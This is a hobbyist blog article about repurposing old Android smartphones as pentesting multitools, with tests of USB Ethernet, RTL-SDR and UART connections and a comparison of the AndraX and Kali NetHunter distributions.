Not only Flipper Zero: a hacker multitool from an old smartphone

Why a smartphone?

Now the choice of devices for any vulnerability researcher is very wide: from a tiny but powerful UMPC, like the GPD Win 4, to a single-board computer like the Raspberry Pi Zero. It is clear that by default such devices have nothing to do with penetration testing or exploiting undocumented features. This is all the domain of software — from homemade scripts to ready-made distributions like Kali Linux (formerly BackTrack).

But each such device has a set of interfaces for interacting with the outside world, and this will initially limit its capabilities. In most cases, the number of interfaces can be increased by adding conditional "modules" in the form of an additional network card, wireless interface, or some kind of RFID tag programmer. This is a reasonable but complex path. It is necessary to take into account the compatibility of devices and the presence or absence of software for a specific hardware platform.

Each of us is sure to have some slightly outdated Android smartphone — this is the very portable computer with a bunch of interfaces and a fairly clear procedure for connecting additional devices. Using a smartphone for pentesting looks attractive right up until it's time to assess the number of available interfaces and the ability to freely gain superuser access. The first is more or less easy to pick up by looking at the specifications of a particular device. But the second is not so simple. Not every smartphone can be easily and effortlessly rooted. For some models, this possibility is not provided at all. The first thing to do when choosing a device is to look at some specialized forum like 4pda and make sure that the smartphone can be subjected to this wonderful procedure.

Ethernet

Now a few words about connecting additional interfaces. Here Android is often capable of surprising. For example, I decided to check if my old smartphone would recognize the simplest 100 Mbps USB network card. To connect the USB device, I used an adapter that has Type-C on one side and offers USB-A, HDMI, VGA, and Jack 3.5” on the output:

From the depths of the homeland, I take out the simplest USB network adapter, assembled in China, plug it into the adapter and then into the smartphone. Just for the sake of experiment, I turn off mobile data transmission and Wi-Fi. After a second, a new icon of the type <···> appears in the top curtain — and voila, the network works. Now I know for sure that there are no problems with connecting almost any smartphone to a regular wired network or network device. Drivers are mostly in the OS kernel, so it starts without any hassle.

I only had three old smartphones at hand, so I decided to check if this would work with all of them:

1. Huawei P9 Lite (Android 9) — works.

2. Huawei P Smart Z (EMUI 12) — works.

3. Blackview P6600 Pro (Android 11) — suddenly does not work, but the USB hub sees it.

An interesting but logical picture emerges. If the firmware developer has not cut out the standard drivers for such network USB adapters, everything works without problems. Otherwise, alas, only independent attempts to add the necessary driver to the kernel, which will not always work. But let's give Blackview another chance and add one of my favorite Chinese RTL-SDR USB dongles there.

SDR

But it is not enough to just connect it: to get SDR working, we will need the appropriate software and a modified driver. Fortunately, such a program and driver are available on Google Play. It is called SDR Touch. This allows you to turn a combination of a smartphone and an RTL-SDR dongle into a primitive but fully functional SDR receiver. The only condition is that it is only compatible with rooted phones. First, we install the SDR Driver application, then SDR Touch, and finally, for 12 $, we buy a license for this wonderful software.

Everything works perfectly, now you can take such a bundle to any convenient place. And the huge Blackview battery can provide long-term operation of the resulting SDR receiver. But both of my Huawei phones will not work — as far as I know, there is no easy way to unlock the bootloader. The trick is that you need an OEM code for this, and Huawei provided it only upon request and only until 2018. And then that's it — no root rights for you and we don't care about your complaints. There seem to be paid utilities, but no one guarantees the result. However, if any of our readers share a working unlocking method, I would be very grateful.

UART

Next, I tried to connect a level converter from FTDI to communicate with other devices via UART. For testing, I will connect to a Raspberry Pi 3 B+, in which the UART protocol was previously activated on the standard pins (enable_uart=1 in the config.txt section of bootfs):

• RPI Pin 8 / GPIO14 — FTDI TXD;

• RPI Pin 10 / GPIO15 — FTDI RXD;

• RPI Pin 6 / Ground — FTDI GND.

For Android, there are convenient applications such as Serial USB Terminal and UsbTerminal. They automatically detect the type of device and allow you to access it with a few taps:

Now we start the "raspberry" and after a few seconds, we see a prompt to enter the device console:

We enter the user's login and password, after which we get full access to control. To execute simple basic commands, you do not need to connect a monitor and keyboard. At this point, the phone only works as an input-output device. Nevertheless, this allows full control without the need to occupy Wi-Fi or Bluetooth, allowing these devices to do more interesting things.

AndraX

Let's move on to the most interesting part. Since Android is based on the Linux kernel, you can run scripts originally created for Linux on it. One independent developer decided that it would be nice to take the Metasploit Framework, add Nmap, Aircrack-NG, and a lot of other goodies, and make a convenient interface for launching. This is how AndraX was born, allowing you to turn almost any smartphone running Android version 5 and above into a pentester's tool.

But this is only in words everything is easy and clear. The reality will be extremely disappointing. If we are talking about scripts that are not tied to working with specific smartphone hardware, then this will work. But as soon as it comes to, for example, intercepting the handshake of a wireless network protected by WPA, a number of problems arise.

The fact is that for successful attacks of this kind, the Wi-Fi adapter must be switched to a special "promiscuous" mode (monitor mode). Firstly, not every Wi-Fi adapter allows you to perform such a trick. Although after some dancing with a tambourine on certain smartphone models, such as the Xiaomi Redmi Note 3, this will work. Secondly, without root rights, this will also not work. Well, if you connect an external Wi-Fi adapter, there is a high probability that it will not work "out of the box" and you will have to patch the kernel, and then flash the phone with it. There are plenty of options to break something.

At some point, the creator of AndraX decided to hype: he deleted the official group and project repositories, and then spread the rumor that the developer was allegedly killed. However, after a couple of weeks, he triumphantly returned to the network, diluting his "I’m back, m*f***". Then another release was released. The story made a lot of noise then, the discussion can be found on 4pda.

At the time of this post, the project is more dead than alive. The official site does not work, and downloading custom builds is not safe at all. Here everything is exclusively at your own risk. The desired APKs and an archive with scripts were noticed on GitHub. But there are no guarantees that this will work at all. I checked in several Android emulators, but none of them worked correctly.

Kali NetHunter

Now let's take a look at another interesting project to turn an Android smartphone into a pentester tool. Kali NetHunter is a separate branch of the Kali Linux project. The developers decided not to be petty and made their set of tools in three possible versions:

1. NetHunter Rootless for smartphones without root rights.

2. NetHunter Lite for rooted devices with custom recovery.

3. NetHunter for rooted phones of certain models for which the developers have created a separate kernel.

The latter option allows you to go all out, as the modified kernel makes it possible to perform all the tricks that the stock kernel is not capable of. Moreover, there is an option to connect a regular monitor via HDMI and get a full-fledged desktop with basic tools. It is surprising that there are even a couple of images for smartwatches on WearOS (TicWatch Pro/Pro 4G/LTE/Pro 2020 and TicWatch Pro 3 GPS/Pro 3 LTE/Pro 3 Ultra GPS/Pro 3 Ultra LTE).

It is worth noting right away that, unlike AndraX, the Kali NetHunter project is alive and regularly updated. As a replacement for the standard firmware, it is recommended to use pure AOSP or LineageOS (formerly CyanogenMod). Instead of the stock recovery, you should install TWRP, and to obtain superuser rights — Magisk. This bundle will give you full control over the system, of course, at your own risk.

The Kali NetHunter set includes a large number of different tools, including those that allow the phone to pretend to be various USB devices: from a keyboard, the keystrokes of which can be pre-programmed, to a USB pocket that connects any ISO/IMG image. Moreover, if your smartphone is not on the recommended list, you can try to build a custom image for your specific model using the Kernel builder.

The project is distinguished by good documentation, which is more or less regularly updated and supplemented. You can ask your question on Discord or IRC (#kali-linux on the irc.oftc.net server), plus read the forums and discussions of the posted images on XDA.

What in the end

It is definitely possible to turn a smartphone into a convenient and functional pentester tool. The main thing is to choose the right model. The easiest way, in my opinion, is to focus on the list of available Kali NetHunter images and purchase the necessary device on the secondary market, there are more than enough offers. But even in this case, be prepared to spend many hours to get everything working correctly.

As for the comparison with Flipper Zero, it will all depend on the task at hand. If you need a portable device that can communicate via UART, almost any rooted phone with the appropriate level converter will do. For more flexibility, you can generally take an Arduino Mega and get a full set for working with GPIO.

Porting the same Kali NetHunter to your device is a great task not for one evening. It can even become a separate hobby for those who love to study operating systems and build their own kernels. There is a great scope for creativity here, and you can be rightfully proud of a successful result.

Have you tried turning your Android smartphone into a pentester tool? Share in the comments.